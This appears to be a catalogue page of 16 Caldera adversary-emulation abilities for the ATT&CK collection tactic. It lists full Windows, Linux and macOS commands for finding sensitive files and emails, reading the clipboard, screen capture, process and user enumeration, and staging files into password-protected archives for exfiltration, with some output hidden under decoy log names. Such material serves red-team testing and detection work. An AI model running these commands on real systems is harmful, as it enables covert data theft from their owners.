Home/Caldera abilities

Caldera emulation abilities

16 runnable adversary-emulation actions · command + platform · mapped to ATT&CK

⚠

Abilities

16 shown of 16

collection ["windows", "linux"] T1119 · Automated Collection ↗

Advanced File Search and Stager

Highly configurable file finder and stager for Linux and Windows. Drops a payload file to the host to parse arguments rather than running multiple commands for each fact (e.g., each file type). This ability allows for a safe mode, only staging files found that have the appropriate file ending. The staging directory is configurable but defaults to the current user's Recycle Bin (Windows) and /tmp (Linux). Payload files include default values for all parameters (matching the base fact source - File Search and Stage). Options for searches: file extensions (include, exclude [windows]), directories (include, exclude), accessed date cutoff, modified date cutoff, sensitive search strings in files or titles.

Show command

[{"platform": "windows", "executor": "psh", "command": ".\\file_search.ps1 -Extensions '#{windows.included.extensions}' -ExcludedExtensions '#{windows.excluded.extensions}'\n -Directories '#{windows.included.directories}' -ExcludedDirectories '#{windows.excluded.directories}'\n -AccessedCutoff #{file.last.accessed} -ModifiedCutoff #{file.last.modified}\n -SearchStrings '#{file.sensitive.content}' -StagingDirectory '#{windows.staging.location}'\n -SafeMode $#{safe.mode.enabled} -PseudoExtension #{pseudo.data.identifier}\n"}, {"platform": "linux", "executor": "sh", "command": "chmod +x ./file_search.sh; ./file_search.sh --extensions '#{linux.included.extensions}'\n --directories '#{linux.included.directories}' --exclude-dir '#{linux.excluded.directories}'\n --accessed '#{file.last.accessed}' --modified '#{file.last.modified}' --search-strings '#{file.sensitive.content}'\n --staging-directory '#{linux.staging.location}' --safe-mode '#{safe.mode.enabled}' --pseudo-ext '#{pseudo.data.identifier}'\n"}]

collection ["linux", "windows"] T1560.001 · Archive Collected Data: Archive via Utility ↗

Compress staged directory (Password Protected)

This ability packages staged files into a password-protected archive. Note - Requires 7Z for Windows and GPG version 2.1+ for Linux

Show command

[{"platform": "linux", "executor": "sh", "command": "tar -C #{host.dir.staged} -czf - . | gpg -c --pinentry-mode=loopback --passphrase #{host.archive.password} > #{host.dir.staged}.tar.gz.gpg && echo #{host.dir.staged}.tar.gz.gpg\n"}, {"platform": "windows", "executor": "psh", "command": "& \"C:\\Program Files\\7-Zip\\7z.exe\" a \"#{host.dir.staged}.7z\" \"#{host.dir.staged}\\*\" \"-p#{host.archive.password}\" | Out-Null;\nsleep 1; ls #{host.dir.staged}.7z | foreach {$_.FullName} | select\n"}]

collection ["darwin", "windows", "linux"] T1115 · Clipboard Data ↗

Copy Clipboard

copy the contents for the clipboard and print them

Show command

[{"platform": "darwin", "executor": "sh", "command": "pbpaste\n"}, {"platform": "windows", "executor": "psh,pwsh", "command": "Get-Clipboard -raw\n"}, {"platform": "linux", "executor": "sh", "command": "xclip -o\n"}]

collection ["darwin", "linux", "windows"] T1074.001 · Data Staged: Local Data Staging ↗

Create staging directory

create a directory for exfil staging

Show command

[{"platform": "darwin", "executor": "sh", "command": "mkdir -p staged && echo $PWD/staged\n"}, {"platform": "linux", "executor": "sh", "command": "mkdir -p staged && echo $PWD/staged\n"}, {"platform": "windows", "executor": "psh,pwsh", "command": "New-Item -Path \".\" -Name \"staged\" -ItemType \"directory\" -Force | foreach {$_.FullName} | Select-Object\n"}]

collection ["linux", "windows"] T1005 · Data from Local System ↗

Find Git Repositories

This ability will locate directories that are cloned Git repositories.

Show command

[{"platform": "linux", "executor": "sh", "command": "for directoryname in $(find /home/ -name '.git' -type d 2>/dev/null | head -5); do\n\tprintf \"$(dirname \"$directoryname\")\\n\";\ndone;\n"}, {"platform": "windows", "executor": "psh,pwsh", "command": "Get-ChildItem C:\\Users -Attributes Directory+Hidden -ErrorAction SilentlyContinue -Filter \".git\" -Recurse | foreach {$_.parent.FullName} | Select-Object; exit 0;\n"}]

collection ["darwin"] T1005 · Data from Local System ↗

Find IP addresses

Grep for IP addresses in file system per user

Show command

[{"platform": "darwin", "executor": "sh", "command": "find $(echo ~#{host.user.name}) -type f -size -500k -maxdepth 5 -exec grep -EIr -o \"(($(echo #{domain.broadcast.ip} | cut -d. -f-2))\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\" 2>/dev/null {} \\;\n"}]

collection ["darwin"] T1005 · Data from Local System ↗

Find company emails

Grep for all emails for the given target company

Show command

[{"platform": "darwin", "executor": "sh", "command": "find $(echo ~#{host.user.name}) -type f -size -500k -maxdepth 5 -exec grep -EIr -o \"\\b[A-Za-z0-9._%+-]+@#{target.org.name}\\b\" 2>/dev/null {} \\;\n"}]

collection ["darwin", "windows", "linux"] T1005 · Data from Local System ↗

Find files

Locate files deemed sensitive

Show command

[{"platform": "darwin", "executor": "sh", "command": "find /Users -name '*.#{file.sensitive.extension}' -type f -not -path '*/\\.*' -size -500k 2>/dev/null | head -5\n"}, {"platform": "windows", "executor": "psh,pwsh", "command": "Get-ChildItem C:\\Users -Recurse -Include *.#{file.sensitive.extension} -ErrorAction 'SilentlyContinue' | foreach {$_.FullName} | Select-Object -first 5;\nexit 0;\n"}, {"platform": "linux", "executor": "sh", "command": "find / -name '*.#{file.sensitive.extension}' -type f -not -path '*/\\.*' -size -500k 2>/dev/null | head -5\n"}]

collection ["darwin", "linux"] T1005 · Data from Local System ↗

Parse SSH config

Search for valid SSH commands in the config file

Show command

[{"platform": "darwin", "executor": "sh", "command": "pip install stormssh && storm list\n"}, {"platform": "linux", "executor": "sh", "command": "pip install -q stormssh 2> /dev/null && storm list | sed 's/\\x1b\\[[0-9;]*m//g'\n"}]

collection ["windows"] T1059.001 · Command and Scripting Interpreter: PowerShell ↗

PowerShell information gathering

System Information Gathering Script

Show command

[{"platform": "windows", "executor": "psh,pwsh", "command": "powershell.exe -c \"Get-WmiObject -class win32_operatingsystem | select -property * | export-csv msdebug.log\";"}]

collection ["darwin", "windows"] T1113 · Screen Capture ↗

Screen Capture

capture the contents of the screen

Show command

[{"platform": "darwin", "executor": "sh", "command": "for i in {1..5}; do screencapture -t png screen-$i.png; echo \"$(cd \"$(dirname \"$1\")\"; pwd -P)/$(basename \"screen-$i.png\")\"; sleep 5; done;\n"}, {"platform": "windows", "executor": "psh,pwsh", "command": "$loadResult = [Reflection.Assembly]::LoadWithPartialName(\"System.Drawing\");\nfunction screenshot([Drawing.Rectangle]$bounds, $path) {\n   $bmp = New-Object Drawing.Bitmap $bounds.width, $bounds.height;\n   $graphics = [Drawing.Graphics]::FromImage($bmp);\n   $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size);\n   $bmp.Save($path);\n   $graphics.Dispose();\n   $bmp.Dispose();\n}\nif ($loadResult) {\n  $bounds = [Drawing.Rectangle]::FromLTRB(0, 0, 1000, 900);\n  $dest = \"$HOME\\Desktop\\screenshot.png\";\n  screenshot $bounds $dest;\n  if (Test-Path -Path $dest) {\n    $dest;\n    exit 0;\n  };\n};\nexit 1;\n"}]

collection ["darwin", "linux", "windows"] T1074.001 · Data Staged: Local Data Staging ↗

Stage sensitive files

copy files to staging directory

Show command

[{"platform": "darwin", "executor": "sh", "command": "cp #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}\n"}, {"platform": "linux", "executor": "sh", "command": "cp #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}\n"}, {"platform": "windows", "executor": "psh", "command": "Copy-Item #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}\n"}, {"platform": "windows", "executor": "cmd", "command": "copy #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}\n"}]

collection ["windows"] T1057 · Process Discovery ↗

SysInternals PSTool Process Discovery

Process discovery via SysInternals pstool

Show command

[{"platform": "windows", "executor": "psh,pwsh", "command": "$ps_url = \"https://download.sysinternals.com/files/PSTools.zip\";\n$download_folder = \"C:\\Users\\Public\\\";\n$staging_folder = \"C:\\Users\\Public\\temp\";\nStart-BitsTransfer -Source $ps_url -Destination $download_folder;\nExpand-Archive -LiteralPath $download_folder\"PSTools.zip\" -DestinationPath $staging_folder;\niex $staging_folder\"\\pslist.exe\" >> $env:LOCALAPPDATA\\output.log;\nRemove-Item $download_folder\"PSTools.zip\";\nRemove-Item $staging_folder -Recurse\n"}]

collection ["windows"] T1047 · WMIC ↗

WMIC Process Enumeration

Capture process id, executable path, pid and parent pid before writing to disk

Show command

[{"platform": "windows", "executor": "psh", "command": "wmic process get executablepath,name,processid,parentprocessid >> $env:APPDATA\\vmtools.log;\ncat $env:APPDATA\\vmtools.log\n"}]

collection ["darwin", "linux"] T1005 · Data from Local System ↗

cURL socket address

See the raw content of a socket

Show command

[{"platform": "darwin", "executor": "sh", "command": "curl #{remote.host.socket}\n"}, {"platform": "linux", "executor": "sh", "command": "curl #{remote.host.socket}\n"}]

collection ["windows"] T1059.001 · Command and Scripting Interpreter: PowerShell ↗

cmd.exe information gathering

User enumeration

Show command

[{"platform": "windows", "executor": "psh", "command": "cmd.exe /c \"net user\" >> C:\\Windows\\temp\\history.log;\ncmd.exe /c \"whoami /priv\" >> C:\\Windows\\temp\\history.log;\ncmd.exe /c \"netstat -ano\" >> C:\\Windows\\temp\\history.log;"}]

Showing 1-16 of 16

Prev 1 Next